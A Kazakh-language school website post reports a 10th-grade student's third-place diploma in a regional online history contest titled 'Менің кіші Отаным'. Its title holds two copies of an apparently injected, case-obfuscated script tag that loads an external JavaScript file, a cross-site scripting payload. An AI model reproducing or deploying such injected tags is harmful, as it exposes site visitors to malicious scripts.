Менің кіші Отаным<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.10.2021

    Ақмола облысы білім басқармасының "Ақмола дарыны"дарынды балалар мен талантты жастары анықтау және қолдау жөніндегі орталығы 2021 жылғы 11-қазан күні Қазақстан Республикасының Тұнғыш Президенті Н.Назарбаевтың "Болашаққа бағдар: рухани жаңғыру" атты мақаласындағы "Туған жер"бағдарламасын іске асыру аясында  9-10 сынып оқушыларына арналған жас тарихшылардың "Менің кіші Отаным" атты 4 республикалық интеллектуалдық конкурсының облыстық кезеңін онлайн режимде өткізді.

Мақсаты - туған елдің тарихына аса қызығушылық танытатын талантты оқушыларды анықтап, олардың шығармашылық қабілетін, қоғамдық белсенділігі дамытуға, өскелең ұрпақтың бойында қазақстандық патриотизм мен азаматтық сезімді қалыптастыру ,мектеп оқушыларының тарих және өлкетану бойынша білімін дамытуға, ұлттық өзін-өзі тануына және олардың кішкентай Отанына деген мақтанышын арттыру.

 Конкурс екі тур бойынша өткізілді.

 I тур - Қазақстан тарихынан тест тапсырмалар орындалды.

II тур- 4 номинация бойынша өткізілді. Біздің мектебіздің атынан 10 сынып оқушысы Рамазан Мадина қатысып,

"Менің кішкентай Отанымның болашағы атты " номинациясында III- дәрежелі дипломының иегері атанды. Жетекшісі Ерік  Қабижан Зейнеқабиденұлы. Жеңімпазды шын жүректен құттықтаймыз! Алдағы уақытта шығармашылық табыс тілейміз!

Просмотров: 466


Пікір қосу



Деректерді қолтаңбаға қосу